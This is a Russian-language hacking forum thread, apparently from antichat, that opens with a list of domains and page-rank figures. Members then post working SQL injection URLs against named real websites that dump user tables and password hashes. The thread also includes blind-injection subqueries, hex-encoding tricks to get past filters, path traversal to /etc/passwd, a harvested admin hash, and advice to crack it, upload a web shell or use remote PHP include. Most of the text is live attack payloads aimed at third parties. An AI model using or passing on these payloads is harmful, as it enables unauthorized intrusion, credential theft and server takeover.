34) www.freezone-ostrava.ru Pr: 4 тИЦ: 10
35) www.vasylyna.lviv.ua Pr: 2 тИЦ: 0
36) www.itdesign.org.ua Pr: 1 тИЦ: 10
37) www.ria.km.ua Pr: 3 тИЦ: 2600
38) www.constancy.com.ua Pr: 3 тИЦ: 40
39) www.biztema.com.ua Pr: 3 тИЦ: 50
40) www.karaban.com.ua Pr: 2 тИЦ: 10
41) www.fortissimo.com.ua Pr: 3 тИЦ: 20
42) www.sspeterandpaulcathedral.org Pr: 3 тИЦ: 0
43) www.nika.lviv.ua Pr: 1 тИЦ: 0
44) www.agaz.com.ua Pr: 2 тИЦ: 20
45) www.avtolife.info Pr: 3 тИЦ: 10
46) www.epk.net.ua Pr: 2 тИЦ: 10
47) www.angelcrimea.com.ua Pr: 1 тИЦ: 0
48) www.mebel.cn.ua Pr: 3 тИЦ: 0
49) www.rhapsody.com.ua Pr: 4 тИЦ: 0
50) www.lzpi.lg.ua Pr: 1 тИЦ: 10
51) www.hard.net.ua Pr: 1 тИЦ: 10
52) www.gonzha.com Pr: 3 тИЦ: 10
53) www.bragur.org.ua Pr: 2 тИЦ: 10
54) www.ratotem.com Pr: 3 тИЦ: 0
55) www.beyonddent.com.ua Pr: 3 тИЦ: 10
56) www.merrywidowthemovie.com Pr: 2 тИЦ: 10
57) www.193.200.173.5 Pr: тИЦ: 0
58) www.d-a.com.ua Pr: 3 тИЦ: 10
59) www.jes.com.ua Pr: 2 тИЦ: 20
60) www.royalplays.com Pr: 2 тИЦ: 0
61) www.2m.net.ua Pr: 2 тИЦ: 0
62) www.hotel-monsignor.com Pr: 1 тИЦ: 10
63) www.forum.kob.org.ua Pr: 2 тИЦ: 0
64) www.zodios.com Pr: 1 тИЦ: 0
65) www.stroyka.in.kh.ua Pr: 0 тИЦ: 9100
66) www.ttsystem.com.ua Pr: 2 тИЦ: 10
67) www.competent.com.ua Pr: 0 тИЦ: 0
68) www.wantedmovie.com.ua Pr: 3 тИЦ: 0
69) www.korg.lviv.ua Pr: 4 тИЦ: 10
70) www.lunaris.org.ua Pr: 3 тИЦ: 20
71) www.gothic.lviv.ua Pr: 2 тИЦ: 30
72) www.spydetect.com.ua Pr: 1 тИЦ: 10
73) www.zhyvytsya.com.ua Pr: 3 тИЦ: 0
74) www.redinard.net.ua Pr: 3 тИЦ: 10
75) www.kimo.ua Pr: 2 тИЦ: 90
76) www.it-expert.net.ua Pr: 1 тИЦ: 0
77) www.kuznetsovsk-rada.gov.ua Pr: 3 тИЦ: 20
78) www.bambook.lviv.ua Pr: 3 тИЦ: 10
79) www.gidrozona.com.ua Pr: 3 тИЦ: 20
80) www.unost.ks.ua Pr: 0 тИЦ: 0
81) www.babeltour.com.ua Pr: 2 тИЦ: 20
82) www.vwd.com.ua Pr: тИЦ: 0
83) www.okna-ua.com.ua Pr: 0 тИЦ: 0
84) www.complexflash.com.ua Pr: 4 тИЦ: 425
85) www.magpie.com.ua Pr: 3 тИЦ: 0
86) www.ef-studio.com.ua Pr: 0 тИЦ: 20
87) www.merenmusic.com Pr: 1 тИЦ: 0
88) www.zhack.info Pr: 2 тИЦ: 10
89) www.salon-elite.com.ua Pr: 2 тИЦ: 10
90) www.web-moda.com Pr: 1 тИЦ: 0
91) www.shatox.com.ua Pr: 2 тИЦ: 0
92) www.webka.org Pr: 4 тИЦ: 10
93) www.platit.info Pr: тИЦ: 30
94) www.olimp-yug.com Pr: 0 тИЦ: 0
95) www.uacar.com.ua Pr: 1 тИЦ: 10
96) www.riffinc.com.ua Pr: 0 тИЦ: 10
97) www.victormartynyuk.com Pr: 2 тИЦ: 10
98) www.emugamer.com Pr: 0 тИЦ: 10
99) www.addinet.com.ua Pr: 2 тИЦ: 10
100) www.daikin.dp.ua Pr: 2 тИЦ: 20
101) www.plus.termolit.ua Pr: 1 тИЦ: 0
102) www.kob.org.ua Pr: 3 тИЦ: 20
103) www.3doworld.info Pr: 3 тИЦ: 10
104) www.5komnat.kiev.ua Pr: 1 тИЦ: 0
105) www.host-lider.com Pr: 0 тИЦ: 0
106) www.bt-shop.com.ua Pr: 3 тИЦ: 10
107) www.magnit.lviv.ua Pr: 1 тИЦ: 0
108) www.uatrans.lviv.ua Pr: 0 тИЦ: 0
109) www.zago-vor.info Pr: 2 тИЦ: 0
110) www.nenormal.com Pr: 0 тИЦ: 10
111) www.komspravka.com Pr: 1 тИЦ: 0
112) www.elitprofil.com.ua Pr: 1 тИЦ: 0
113) www.mebelin.kiev.ua Pr: 2 тИЦ: 20
114) www.velton.kh.ua Pr: 0 тИЦ: 9100
115) www.aybolit.org Pr: 3 тИЦ: 10
116) www.comforta.com.ua Pr: 3 тИЦ: 0
117) www.dnepr-real-estate.dp.ua Pr: 1 тИЦ: 0
118) www.djon.com.ua Pr: 2 тИЦ: 10
119) www.ttcom.kiev.ua Pr: 1 тИЦ: 0
120) www.aristeya.com.ua Pr: 4 тИЦ: 0
121) www.ogneypor.termolit.ua Pr: 1 тИЦ: 0
122) www.megaplay.com.ua Pr: 1 тИЦ: 10
123) www.news.kob.org.ua Pr: 3 тИЦ: 0
124) www.blog.leonidv.com.ua Pr: 2 тИЦ: 10
125) www.zir.ck.ua Pr: 0 тИЦ: 0
126) www.zverek.net Pr: 1 тИЦ: 10
127) www.forum.jes.com.ua Pr: 2 тИЦ: 0
128) www.tehnostyle.com Pr: 0 тИЦ: 0
129) www.studio-maximus.com Pr: 4 тИЦ: 60
130) www.teco.com.ua Pr: 1 тИЦ: 30
131) www.pskcleaning.com.ua Pr: 1 тИЦ: 0
132) www.niva-hotel.donetsk.ua Pr: 1 тИЦ: 10
133) www.mazhor.kiev.ua Pr: 2 тИЦ: 50
134) www.microstar.vn.ua Pr: 2 тИЦ: 0
135) www.wiki.kob.org.ua Pr: 1 тИЦ: 0
136) www.retromusik.com.ua Pr: 2 тИЦ: 0
137) www.zaj-studio.com Pr: 0 тИЦ: 0
138) www.kiev-models.net Pr: 3 тИЦ: 0
139) www.ukrtorg.net Pr: тИЦ: 0
140) www.dybkov.kiev.ua Pr: тИЦ: 20
141) www.fengshui-doctrine.com Pr: 2 тИЦ: 0
142) www.cityko.com.ua Pr: 1 тИЦ: 0
143) www.arenda-sevastopol.info Pr: 2 тИЦ: 10
144) www.platitwmr.info Pr: 0 тИЦ: 10
145) www.zabudovi.net Pr: 3 тИЦ: 20
146) www.music-video.com.ua Pr: 2 тИЦ: 0
147) www.agame.info Pr: 2 тИЦ: 0
148) www.slepoy.com.ua Pr: 0 тИЦ: 0
149) www.gipsokarton-servis.com.ua Pr: 1 тИЦ: 0
150) www.eshar.com.ua Pr: 2 тИЦ: 0
151) www.prom-detal.com.ua Pr: 1 тИЦ: 0
152) www.businessnumbers.com.ua Pr: 1 тИЦ: 0
153) www.vigamer.com Pr: 2 тИЦ: 0
154) www.freezone-ostrava.com.ua Pr: 4 тИЦ: 10
155) www.anvess.com Pr: 2 тИЦ: 50
156) www.blog.sorop.ru Pr: 1 тИЦ: 10
157) www.baklashka.biz Pr: 2 тИЦ: 0
158) www.comp-as.net.ua Pr: 0 тИЦ: 0
159) www.kvartirochka.com Pr: 2 тИЦ: 0

http://2ip.ru/server.php?ip=193.200.173.5
а к чему тогда табла admin?
и вот ещё такой же сайт, на нём выдрал
http://www.pitersex.com/details_news.php?page=1&id=107%20UNION%20SELECT%201,password%20,3,login,5, 6,7%20FROM%20users%20--
они тоже не с него?

блин,я в этом далёк)

чо вы там мучаетесь - надо уже шелл заливать ))
а что даст шелл?...я принципально знаю что это..но всё же...подскажи,или может faq на єту тему

а что даст шелл?...я принципально знаю что это..но всё же...подскажи,или может faq на єту тему


ну а зачем, тогда скуль раскручивать? Чтоб получить шелл или админку хотя бы.. чтоб доступ получить к серву.. а дальше уж решай сам..

что касается админки -это фейк какой то наверное.. левая админка видимо..

ыыыыы

http://www.sex.dp.ua/phpinfo.php

ыыыыы

http://www.sex.dp.ua/phpinfo.php
матёро))

Там есть форум phpbb3. можно поглумиться:))) А можно и шелл залить:



http://www.sex.dp.ua/forum/

http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,group_concat(column_name ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30+from+information_sche ma.columns+where+table_name=0x7068706262335F757365 7273--

http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,unhex(hex(concat(usernam e,0x3a,user_password))),3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 +from+phpbb3_users+limit+2,1--

Сашок - 220778 (юзер с ID=3).
http://sex.dp.ua/details.php?id=-5202%20UNION%20SELECT%201,unhex(hex(concat(user_ty pe,0x3a,username,0x3a,user_password))),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30+from+phpbb3_users+where+user_type= 3+limit+0,1--

3:admin:$H$7mXvdxG0gVQriTbrzTiSoJAUtMUjEA/

админка здесь:

http://www.sex.dp.ua/forum/adm/

Расшифровывай хеш, заливай шелл

а если скуля слепая без вывода (1 столбец)
что делать?
как вывести то?

Читать мою подпись - там на все случаи практически. Или ссылку сюда давай

Octave_Parango Вопрос не понятен, тебе в прошлый раз отвечали, что через GROUP_CONCAT выводится определённое количество символов, сколько именно прописано в group_concat_max_len(по умолчанию 1024), и повлиять на это через инъекцию нельзя, можно только фильтровать данные(тоесть выводить с помощью фильтров, нужных тебе). Ты всегда можешь вывести все данные, не используя GROUP_CONCAT, а используя просто лимит.
name,pass+FROM+table+limit+1,1
В чём вопрос, попробуй переформулировать

Спасибо за ответ.
Можно в таком случае привести пример на моем случае.
Есть порядка 12к записей.
Лимит не работает, просто не выводит данные и я не представляю перебирать лимитов такое количество.

p.s. Возможно я туплю, но что-то реальный ступор у меня...

F4R в слепой скуле только подзапросы, читай статьи по скулям, материала куча, практически в любой статье есть описание работы с подзапросами

Octave_Parango на каком твоём случае нужно превести пример? Ссылки нет. И что значит лимит не работает? Так не бывает к счастью ). Он просто не может не работать. А дамп базы через скуль, это вобщем никогда не было приятной процедурой(особенно когда вывод по одной записи). Скуль для этого вобщем-то не используют в основном. Через неё получают доступ в админку, или напрямую льют шелл, а потом уже дампят базу

не пойму как вывести через group_concat(),вот как делаю:

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group _concat(table_name%20separator%200?0a),6,7,8,9,10, 11,12,13,14,15+from+information_schema.tables--


вот уязвимость без group_concat():

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,table _name,6,7,8,9,10,11,12,13,14,15+from+information_s chema.tables--

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group _concat(table_name),6,7,8,9,10,11,12,13,14,15+from +information_schema.tables--

ага) а как разделить сменить на <br>
так получается

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group _concat(concat_ws(0x3a,table_name,column_name)+sep arator+0x3b),6,7,8,9,10,11,12,13,14,15+from+inform ation_schema.columns--

а так нет :(

http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group _concat(concat_ws(0x3a,table_name,column_name)+sep arator+char(60,98,114,62)),6,7,8,9,10,11,12,13,14, 15+from+information_schema.columns--

Так тебе нужно?
http://www.ovalframes.co.za/index.php?page_name=more&type=circle&frame_id=17897669898768+union+select+1,2,3,4,group _concat(concat_ws(0x3a,table_name,column_name)+sep arator+0x3C62723E),6,7,8,9,10,11,12,13,14,15+from+ information_schema.columns--

Да, это! спасибо!

уммммм,хотелось бы посмотреть как выводить данные по кускам, ибо limit здесь не работает :(
пробовал substring в запросе - не прокатывает. Почитал о чем эти говорят:
http://forum.antichat.ru/threadnav46016-495-10.html (и предыдущая страница)
выводить только на первую букву тоже не катит если очень большая или мальенькая БД :(
а о чем еще способ, который предложил l1ght я вообще не вдуплю.
Есть какие предложения?

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name='jos_users'/* не показывает колонки в табле чо делать?

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,group_concat(column_name)+from+in formation_schema.columns+where+table_name=0x6A6F73 5F7573657273/*


Скачать кодировщик (http://slil.ru/26595816)

je0n, а что там не понятного? смотри, например, в таблице users n записей:
Админ,Бобик,Вовик,Гогик,Дод ик...
предположим group_concat(users) выводит три записи
Админ,Бобик,Вовик
ставим условие where users>'Вовик' (или 0xВовик) => выводится следущие три записи в алфавитном порядке

Ghost0ff,
http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,column_name+from+information_sche ma.columns+where+table_name=0x6a6f735f7573657273--+
select hex('jos_users')
http://k0x.ru/encoder/index.php 1 строчка

хм. Я в случае не отображения ставил md5 тоесть 'jos_users' шифровал и подставлял 0xдалее зашифрованное 'jos_users' в какой шифровке вы это мутите?

Ghost0ff, при чём тут MD5? Если кавычки фильтруются, то это обходится с помощью 0xZZZZZZZZ, где Z-представление каждого байта слова в шестнадцатиричном эквиваленте... То есть для jos_users (без кавычек) это 0x6A6F735F7573657273

Все, понял. Спасибо за толковое описание ) трабла №2: http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,username+from+jos_users/* не отображает (Хочу за 1 раз забать все вопросы меня интересующие)
P.S. эти 2 вопроса меня мучали пол жизни

Определяем БД, где таблица jos_users:


http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,table_schema+from+information_sch ema.columns+where+table_name=0x6A6F735F7573657273/*


А теперь правильно забираем данные:


http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9+union+select+1,username+from+test.jos_users/*

На будущее, когда лазишь по базе, старайся выбирать те таблицы, которые лежат в контексте того юзера, под которым работает бажное приложение:

http://www.rfbd.ru/info.php?id=370&region=59&rubrika=-9999+UNION+SELECT+1,CONCAT_WS(0x3a,table_schema,ta ble_name)+FROM+information_schema.tables+WHERE+tab le_schema=DATABASE()+LIMIT+0,1--+

http://www.lider-grup.ru/news.php?newsid=-33+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4/*

Сбрутил только таблицу новостей.У кого есть хорошие словари,пробегитесь =_=,а то я ф панике.

Господа, интересуют уязвимости WordPress, что кто может посоветовать?

Господа, интересуют уязвимости WordPress, что кто может посоветовать?
милворм :)

http://www.lider-grup.ru/news.php?newsid=-33+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4/*

Сбрутил только таблицу новостей.У кого есть хорошие словари,пробегитесь =_=,а то я ф панике.
а чем брутиш?

http://www.milw0rm.com/ ? Что то ничего там не нашел :(

http://www.milw0rm.com/ ? Что то ничего там не нашел :(

Ну раз не нашел, то качай исходник и фперед :)

http://runnercat.org.ua/page.php?id=13172%20order%20by%201%20--
а что дальше?

http://runnercat.org.ua/page.php?id=13172+and+substring(version(),1,1)=5

http://milw0rm.com/search.php wordpress

http://runnercat.org.ua/page.php?id=13172%20order%20by%201%20--
а что дальше?
А дальше http://runnercat.org.ua/page.php?id=-13172+union+select+1+--

и "you are bannded Dear mr Cracker" =)))

Ребят помогите развести вот такую тему че то дальше не смог никуда пойти.

http://www.asipartner.com/pr.asp?ID=78+or+1=@@version--

'Microsoft SQL Server 2005 - 9.00.3068.00 (Intel X86) Feb 26 2008 18:15:01 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.asipartner.com/pr.asp?ID=78+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+IN FORMATION_SCHEMA.TABLES)--

ExpireNewSKU
http://www.asipartner.com/pr.asp?ID=781+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( char(69)%2Bchar(120)%2Bchar(112)%2Bchar(105)%2Bcha r(114)%2Bchar(101)%2Bchar(78)%2Bchar(101)%2Bchar(1 19)%2Bchar(83)%2Bchar(75)%2Bchar(85)))--

QUESTIONS
http://www.asipartner.com/pr.asp?ID=781+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+( char(69)%2Bchar(120)%2Bchar(112)%2Bchar(105)%2Bcha r(114)%2Bchar(101)%2Bchar(78)%2Bchar(101)%2Bchar(1 19)%2Bchar(83)%2Bchar(75)%2Bchar(85),char(81)%2Bch ar(85)%2Bchar(69)%2Bchar(83)%2Bchar(84)%2Bchar(73) %2Bchar(79)%2Bchar(78)%2Bchar(83)))--

ANSWERS

и т.д. https://forum.antichat.ru/thread30501.html

здраствуйте
отправили меня в этот топик :)
вот сдаюсь

помогите пожалуйста
http://www.pitchsidemanager.com/club.php?stid=-1294'
http://www.pitchsidemanager.com/profile.php?smid=-1'
http://www.pitchsidemanager.com/player_profile.php?pid=-3406'

а где тут скуль???

Наверно нужно быть зарегенным что-бы увидеть...



http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00

здраствуйте
отправили меня в этот топик :)
вот сдаюсь

помогите пожалуйста
http://www.pitchsidemanager.com/club.php?stid=-1294'
http://www.pitchsidemanager.com/profile.php?smid=-1'
http://www.pitchsidemanager.com/player_profile.php?pid=-3406'

Вот:

http://www.pitchsidemanager.com/club.php?stid=-1294'+union+select+1,2,3,4,5,6,7,8,9,version(),11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35,36,37,38,39,40,41--+

AkyHa_MaTaTa, union%0Aselect, но все равно привет подзапросам, см сам)

а чем брутиш?

А это имеет значение ? Работает же.

Наверно нужно быть зарегенным что-бы увидеть...



http://www.pitchsidemanager.com/new_player.php?ad=&step=../../../../../../../../etc/passwd%00



улыбнуло :)

Спасибо всем ! значит просто я поля не так подбирал ...

вот еще одна незадача.




motion-twin.com/blog/month?m=10001'

1. Когда подставляю -10001' ошибка не выползает , но что бы выползла - не получается

2. Если выполнить такой запрос -1'/* ошибка показывается вот с такой фишкой , где меняется дата

SELECT BlogEntry.* FROM BlogEntry LEFT JOIN BlogCategory ON BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '-1'/-*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '*-01' AND cdate <= '-1'/-*-31' ORDER BY cdate DESC' at line 1


3 . Если убрать минус то получится 1'/* то выдает date.c(104) : Invalid date format : 1-00-01


4 .Попбробовал -1-00-01'/* Календарь показал :

Zero -1
Lu Ma Me Je Ve Sa Di
1 2 3 4

5. (если -10 то ивалид date , если -100,-200 etc то на календаре меняется Zero -100, -200)

6 . Все что ниже 10000 = ошибка

7. А вот когда делаю запрос m=999999'+order+by+1/*

на календаре теперь

null 9999
Lu Ma Me Je Ve Sa Di
1 2 3 4

(на заметку : отображаются только числа 1,2.3.4 на каледнаре из 31)

8 . Пробовал 25-02-05' или 25-02-05 для примера показывает February 25

9. когда -25-02-05 выдает date.c(104) : Invalid date format : -25-02-01

10 . когда 1'+order+by+1/* выдает ошибку где вместо 0000 видно такое :)

BlogEntry.categoryId=BlogCategory.id WHERE hidden=0 AND isVisible=1 AND cdate >= '1' o-rd-01' AND cdate <= '1' o-rd-31' ORDER BY


=

А это имеет значение ? Работает же.
просто спросил....вот у меня нет брута..хотел узнать где взял.


Мужики, а как узнать количество столбцов,когда
http://photo.gala.net/index.php?action=view&id=120141026%20order%20by%2011%20--
показывает не полный вывод страницы..но вывод,а
http://photo.gala.net/index.php?action=view&id=120141026%20order%20by%205%20--
полный
так как order by 12 воще ничего не выводит
и в том и в том случае не видно названия столбцов
(-)пробовал

и ещё вопрос,если при вставлянии кавычки перебрасывает на главную, это скуль? Если да,тот остановить переброс?
Вот пример:
http://sinelnikovo.org.ua/viewpage.php?page_id=21'

а вот ещё вопросег,есть скуль:
http://www.bisound.com/index.php?name=Files&op=view_file&id=8533321%20order%20by%2032%20--
а при union select перебрасівает на главную

TELO
http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222--
1 колонка

http://www.bisound.com/index.php?name=Files&op=view_file&id=8533321+or+1=1/*
скуля есть подбирай поля в ручную... перебрасывает изза того что запрос не верный )

http://sinelnikovo.org.ua/viewpage.php?page_id=21'
скули нет


x311
http://www.motion-twin.com/blog/day?d=20090109
хмм чтото не понятное) может просто ругается на неправильную дату?

Подобрал примерные таблицы (14 полей)
Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!)

http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,1 2,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='ibf_profile_portal'+limit+1,1--

Не выводиться =\
я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю)

вообщемс помогите что у меня не так в запросе :)

Подобрал примерные таблицы (14 полей)
Пытаюсь вывести колонки из таблицы (пробелы из линка моего убрать!)

http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,1 2,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME='ibf_profile_portal'+limit+1,1--

Не выводиться =\
я слышал что надо как то перекодировать таблицу после табл нейм (ну точно не знаю)

вообщемс помогите что у меня не так в запросе :)
название таблички в hex
0xHExназваниетаблицЫ
у тебя будет
http://www.bzpower.com/story.php?ID=-1+union+select+1,2,3,4,5,6,COLUMN_NAME,9,9,10,11,1 2,13,11111+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+T ABLE_NAME=0x6962665f70726f66696c655f706f7274616c+l imit+1,1--

Есть сайт так вот при подборе полей ниче не выводиться а когда подставляю id=1' то ошибка есть(еррор синтаксис)!
Мб кто знает?
Пробывал и так подобрать id=1'+union+select+1,2-- (и т.д.) все равно ошибка Mysql (причем в синтаксисе и перебрал я так до 20 полей) а если убрать ' то ниче не выводиться как я говорил

Ссылку сюда или сейчас начнем телепатировать всем ачатом

http://www.brockport.edu/athletics/baseball/index.php?id=432'

:-)

http://www.brockport.edu/athletics/baseball/index.php?id=-432'+union+select+1,2,3,user(),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20/*

http://www.brockport.edu/athletics/baseball/index.php?id=432'+and+substring(@@version,1,1)=4/*


4-ая ветка

Ребята, подскажите:
Что-то не пойму:
Вывожу данные:
=-6285+union+select+1,2,3,4,5,6,7,8,9,10,group_conca t(user,0x3a,email),12+from+users--
Выводит какое-то количество данных, пробую лимитом "user":
=-6285+union+select+1,2,3,4,5,6,7,8,9,10,user,12+fro m+users+limit+1,1--
Данные не выводятся:
Пробую просто concat - тоже самое, а также _ws - тоже ничего не хочет выводить...
В чем косяк?

Octave_Parango
Чем помочь? Погадать? На картах или на кофейной гуще предпочитаете?

Запрос верен, если запись не одна, должно выводить, остальное домыслы и без линка не уместны

jokester,
Ок. спасибо!

x311

хмм чтото не понятное) может просто ругается на неправильную дату?

http://www.motion-twin.com/blog/month?m=10001'

ну бага ведь в месяце ....

вопрос таков, есть сайтег скуля есть но слепая верся БД 4, есть форум ипб кто нибудь может дать название табелок и колонок в бд для форума?

вопрос таков, есть сайтег скуля есть но слепая верся БД 4, есть форум ипб кто нибудь может дать название табелок и колонок в бд для форума?
http://up.cih.ms/ettee/sql/
помогает)

spasibo

sabe
http://photo.gala.net/index.php?action=view&id=-120141026+union+select+222+--+

1 колонка


не пойму, ну выводит 222,а как узнать версию?

Это не вывод...

http://photo.gala.net/index.php?action=view&id=120141026+union+select+111111111111111--

Похоже, там 11 колонок, но вывода нету.

Насчёт подзапросов...
Всего пару раз встречался с Sybase ASE, поэтому не знаю, работают они там или нет..
Вроде нет.

Хотя.. сейчас может придёт дядя jokester и отругает меня за то, что я снова тороплюсь ^^

Здравствуйте)
Помогите найти ошибку,пожалуйста! :)

http://www.tehbasa.ru/index.php?idt=25
+and+ascii(lower(substring(select+password
+from+mysql.user+where
+user=char(116,101,104,98,97,115,97,95,97,
115,105,100,64,55,57,46,49,55,52,46,55,51,46,55,50 )+limit+1),1,1)))%3C=122

http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+ password+from+mysql.user+where+user=char(116,101,1 04,98,97,115,97,95,97,115,105,100,64,55,57,46,49,5 5,52,46,55,51,46,55,50)+limit+1,1),1,1)))%3C=122
либо
http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+ password+from+mysql.user+where+user=char(116,101,1 04,98,97,115,97,95,97,115,105,100,64,55,57,46,49,5 5,52,46,55,51,46,55,50)+limit+1,1)))%3C=122

даже не глядя - +limit+1 = бред. Как минимум limit+0,1

и что такое "%3C="???

просто "=" уже не модно?

%3C=
Это <=

Причем тут модно не модно!я проверяю существует ли вообще:)

http://www.tehbasa.ru/index.php?idt=25+and+ascii(lower(substring(select+ password+from+mysql.user+where+user=char(116,101,1 04,98,97,115,97,95,97,115,105,100,64,55,57,46,49,5 5,52,46,55,51,46,55,50)+limit+1,1)))%3C=122

если ты убераешь 1,1 с чем тогда сравнивать?

Перед select нехватает одной скобки..

А вообще, там нету mysql.user )

А не проще http://www.tehbasa.ru/index.php?idt=25+UNION+SELECT+CONCAT_WS(0x3a,Versi on(),Database(),User()),2,3,4,5,6,7/*

?

А не проще

?
так я хочу вывести пароль!Название базы то есть,оно закодировано в чар

А не проще

?

Мне кажется, его интересовали именно подзапросы...
Хотя мб и нет..

Мне кажется, его интересовали именно подзапросы...
Хотя мб и нет..
угу :) для 4 ветки это полезно изучить!да и понадобится,когда вывод ошибок отключен!

http://trophymanager.com/klubhus.php?showclub=1'
нужна ренистпация, поля не смог подобрать .

http://trophymanager.com/klubhus.php?showclub=1'
нужна ренистпация, поля не смог подобрать .
ну акк бы дал..нахер кому надо регатца там

x311, ну так скинь зареганный акк...

1.Гы))Вбивай кавычки везде )))
2.Ini_get()
3.phpinfo()
4.Мб CVS на сервере дежурит:).
5.Поискать инклуд или sql и попробывать прочесть файл.
6.Поглядеть исходники
7.Посмотреть в Гугле описание директивы mysql_quotes_gpc и не задавать этот вопрос снова:)

http://trophymanager.com/klubhus.php?showclub=1'
нужна ренистпация, поля не смог подобрать .

Вот...

http://trophymanager.com/klubhus.php?showclub=1+and+1=0+union+select+1,2,ve rsion(),4,5,6,7,8,9,0,11,12,13,14--

http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world

что можно с этим добром сделать ? как дальше пройти?

Брутить ФТП или как вариант почитать сорцы конфигов движка с целью доступа к БД или мб к панели администратора

http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world

что можно с этим добром сделать ? как дальше пройти?
https://forum.antichat.ru/thread49775.html
http://forum.antichat.ru/showthread.php?p=400021

http://hl-online.ru/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/admin.php
http://hl-online.ru/forum/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/k/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/lib/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/photos/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://hl-online.ru/index.php?action=faq&templatecache[faq]=hello+world

что можно с этим добром сделать ? как дальше пройти?
Чего-то я там не вижу php-include. Может прикрыли уже? Но как вариант было найти реальный путь, и инклюдить файлы, начиная с index'a и дойдя так до БД слогами, но надо, что бы там было читалка. Можно было провести удаленный php-include, т.е. file.php?a=http://site.ru/shell.txt. Желательно именно *.txt, потому что не всегда можно *.php заливать и не факт, что сработает, а так любой файл даже *.txt все-ровно принимается как *.php!

http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%201,group_concat(table_name)%20 from%20information_schema.tables%20%20--

Помогите плиз, вобщем вывел таблицы через Group_concat но они не все выводяться, а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...

Assembler,
http://www.wowpourlesnuls.fr/images.php?img=-1%20union%20select%2001,concat(username,0x3a,passw ord)username%20from%20mybb_users+limit+0,1--

вывел таблицы через Group_concat но они не все выводяться,
А где написано, что они должны все выводиться?
а лимит работает но как то странно допустим при 15,1 дает VIeus а через минуту при 15,1 выдает ошибку, так до конца и не могу добраться, подскажите кто нить в чем проблема...
